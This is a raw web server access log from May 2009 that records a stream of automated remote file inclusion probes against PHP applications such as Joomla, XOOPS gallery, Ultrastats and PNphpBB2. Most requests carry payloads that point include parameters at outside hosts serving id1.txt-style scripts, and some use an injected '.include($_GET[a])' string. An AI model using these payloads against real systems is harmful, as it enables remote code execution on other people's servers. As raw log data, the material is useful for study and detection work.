87.51.48.38 - - [19/May/2009:03:07:29 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
87.51.48.38 - - [19/May/2009:03:07:29 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/contact.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
64.34.161.16 - - [19/May/2009:03:07:40 -0400] "GET /modules/Ultrastats/include/functions_common.php?gl_root_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:07:40 -0400] "GET /logs/modules/Ultrastats/include/functions_common.php?gl_root_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:07:40 -0400] "GET /logs/access_log.Q108022400/modules/Ultrastats/include/functions_common.php?gl_root_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:07:58 -0400] "GET /logs/access_log.Q108112100/modules/Ultrastats/include/functions_common.php?gl_root_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:08:07 -0400] "GET /index.php?arquivo=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:08:07 -0400] "GET /logs/index.php?arquivo=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:08:42 -0400] "GET /index.php?arquivo=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:08:42 -0400] "GET /logs/index.php?arquivo=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:09:38 -0400] "GET /logs/access_log.Q108122500%20%20//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:09:53 -0400] "GET /logs/access_log.Q108022400%20%20/modules/Ultrastats/include/functions_common.php?gl_root_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:09:59 -0400] "GET /logs/access_log.Q108112100%20%20/modules/Ultrastats/include/functions_common.php?gl_root_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:09:59 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:09:59 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:10:00 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:10:00 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:10:00 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:10:01 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:10:04 -0400] "GET /logs/access_log.Q108052400//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:10:05 -0400] "GET /logs/access_log.Q108052400//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:10:09 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:10:09 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:10:10 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:10:16 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:10:16 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:10:16 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:10:20 -0400] "GET /logs/access_log.Q108052400//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:10:21 -0400] "GET /logs/access_log.Q108052400//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:10:28 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:28 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:28 -0400] "GET //include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:28 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:28 -0400] "GET //include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:28 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:38 -0400] "GET /logs/access_log.Q108051700//include/bbs.lib.inc.php?site_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:39 -0400] "GET //include/bbs.lib.inc.php?site_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:39 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 227 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:44 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
110.45.144.106 - - [19/May/2009:03:10:45 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/id.txt?? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
218.249.36.194 - - [19/May/2009:03:10:46 -0400] "GET /logs/access_log.Q108082900//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 235 "-" "libwww-perl/5.79"
218.249.36.194 - - [19/May/2009:03:10:46 -0400] "GET //index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.79"
218.249.36.194 - - [19/May/2009:03:10:47 -0400] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://sherif-dudulz.ucoz.com/id.txt? HTTP/1.1" 404 213 "-" "libwww-perl/5.79"
200.93.147.154 - - [19/May/2009:03:11:00 -0400] "GET /logs/access_log.Q108052400%20%20//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
209.59.12.99 - - [19/May/2009:03:11:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
218.246.20.221 - - [19/May/2009:03:11:40 -0400] "GET /logs/index.php?arquivo=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
218.246.20.221 - - [19/May/2009:03:11:40 -0400] "GET /logs/error_log.Q109051400%20%20/index.php?arquivo=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:12:19 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:12:19 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:12:19 -0400] "GET /logs/access_log.Q108052400%20%20//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:12:19 -0400] "GET /logs/access_log.Q108052400%20%20//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:12:45 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:12:45 -0400] "GET /logs/access_log.Q108052400%20%20//admin/business_inc/saveserver.php?thisdir=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:12:48 -0400] "GET /logs//include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/test.txt??? HTTP/1.1" 404 227 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
110.45.144.106 - - [19/May/2009:03:12:48 -0400] "GET //include/bbs.lib.inc.php?site_path=http://shw.or.kr/bbs/bbs_public/06notice/test.txt??? HTTP/1.1" 404 222 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
200.93.147.154 - - [19/May/2009:03:13:01 -0400] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:13:01 -0400] "GET //admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:13:01 -0400] "GET /logs/access_log.Q108071500//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:13:05 -0400] "GET /logs/access_log.Q108052400//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
218.246.20.221 - - [19/May/2009:03:13:33 -0400] "GET /logs/error_log.Q109051400/index.php?arquivo=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:13:57 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:14:01 -0400] "GET /logs/access_log.Q108052400%20%20//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:03:14:21 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:03:14:21 -0400] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:03:14:21 -0400] "GET /logs/access_log.Q108082900%20%20/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:03:14:27 -0400] "GET /logs/access_log.Q109020700%20%20/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:03:14:29 -0400] "GET /index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:03:14:29 -0400] "GET /logs/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:03:14:29 -0400] "GET /logs/access_log.Q108082900%20%20/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
124.217.216.86 - - [19/May/2009:03:14:45 -0400] "GET /logs/access_log.Q109020700%20%20/index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://sherif-dudulz.ucoz.com/id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
208.112.87.9 - - [19/May/2009:03:14:46 -0400] "GET /http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
65.98.59.178 - - [19/May/2009:03:14:48 -0400] "GET /logs/access_log.Q108102400//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:15:03 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:15:03 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:15:03 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:15:03 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:15:10 -0400] "GET /logs/access_log.Q108052400//newspublish/include.php?path%5Bdocroot%5D=http://h1.ripway.com/roni121/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:15:14 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/index.php?basepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:15:14 -0400] "GET //modules/My_eGallery/index.php?basepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:15:14 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:15:15 -0400] "GET /logs/access_log.Q109051100//modules/My_eGallery/index.php?basepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:15:15 -0400] "GET /logs//modules/My_eGallery/index.php?basepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:15:15 -0400] "GET //modules/My_eGallery/index.php?basepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:15:27 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:15:27 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:15:27 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:15:27 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:15:37 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:15:37 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:15:39 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
65.98.59.178 - - [19/May/2009:03:15:39 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:15:44 -0400] "GET /logs/access_log.Q109051100//include/bbs.lib.inc.php?site_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 249 "-" "libwww-perl/5.79"
209.59.12.99 - - [19/May/2009:03:16:02 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
207.182.137.218 - - [19/May/2009:03:16:05 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:16:05 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:16:05 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
207.182.137.218 - - [19/May/2009:03:16:05 -0400] "GET /logs/access_log.Q108120600//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
110.45.144.106 - - [19/May/2009:03:16:09 -0400] "GET //include/bbs.lib.inc.php?site_path=http://members.lycos.co.uk/radek2005/w/on.txt?????? HTTP/1.1" 404 222 "-" "libwww-perl/5.79"
200.93.147.154 - - [19/May/2009:03:16:17 -0400] "GET /logs/access_log.Q108071500%20%20//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:16:20 -0400] "GET /logs/access_log.Q108052400%20%20//admin/business_inc/saveserver.php?thisdir=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:16:40 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/index.php?basepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
91.121.210.42 - - [19/May/2009:03:16:45 -0400] "GET /logs/access_log.Q109051100%20%20//modules/My_eGallery/index.php?basepath=http://abirdseyeviewof.com/files/image/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:17:01 -0400] "GET /index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:17:01 -0400] "GET /logs/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
64.34.161.16 - - [19/May/2009:03:17:01 -0400] "GET /logs/access_log.Q109030500%20%20/index2.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://indoirc.go.ro/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:17:15 -0400] "GET /logs/access_log.Q108120600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
88.191.103.144 - - [19/May/2009:03:17:15 -0400] "GET /logs/access_log.Q108061500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
80.90.20.125 - - [19/May/2009:03:19:21 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:03:19:30 -0400] "GET /logs/access_log.Q108090500/?sourcedir=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:03:19:30 -0400] "GET /?sourcedir=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
203.151.233.72 - - [19/May/2009:03:19:31 -0400] "GET /logs/?sourcedir=http://www.blixweb.no/rhey/software/Fire%20scan/idfire.txt? HTTP/1.1" 200 1954 "-" "libwww-perl/5.805"
208.112.87.9 - - [19/May/2009:03:20:10 -0400] "GET /logs/error_log.Q109050400/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.803"
208.112.87.9 - - [19/May/2009:03:20:10 -0400] "GET /http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 242 "-" "libwww-perl/5.803"
208.112.87.9 - - [19/May/2009:03:20:10 -0400] "GET /logs/http://oubkhammuseum.com/templates/idvop.txt? HTTP/1.1" 404 247 "-" "libwww-perl/5.803"
208.80.195.40 - - [19/May/2009:03:20:15 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; AT&T WNS5.1; FunWebProducts)"
72.52.230.168 - - [19/May/2009:03:20:20 -0400] "GET /logs/access_log.Q108120600%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
72.52.230.168 - - [19/May/2009:03:20:20 -0400] "GET /logs/access_log.Q108061500%20%20//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.laxestereo.com/AdControl/copyright.txt???? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
80.90.20.125 - - [19/May/2009:03:20:37 -0400] "GET /logs/access_log.Q108091400//oneadmin/photogallery/include.php?path[docroot]=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
80.90.20.125 - - [19/May/2009:03:20:37 -0400] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 232 "-" "libwww-perl/5.805"
80.90.20.125 - - [19/May/2009:03:20:38 -0400] "GET /logs//oneadmin/photogallery/include.php?path[docroot]=http://www.tkcchoir.org/xml/pw.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
200.93.147.154 - - [19/May/2009:03:20:53 -0400] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:20:53 -0400] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
200.93.147.154 - - [19/May/2009:03:20:53 -0400] "GET /logs/access_log.Q108061500//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://h1.ripway.com/adi121/id1.txt?? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
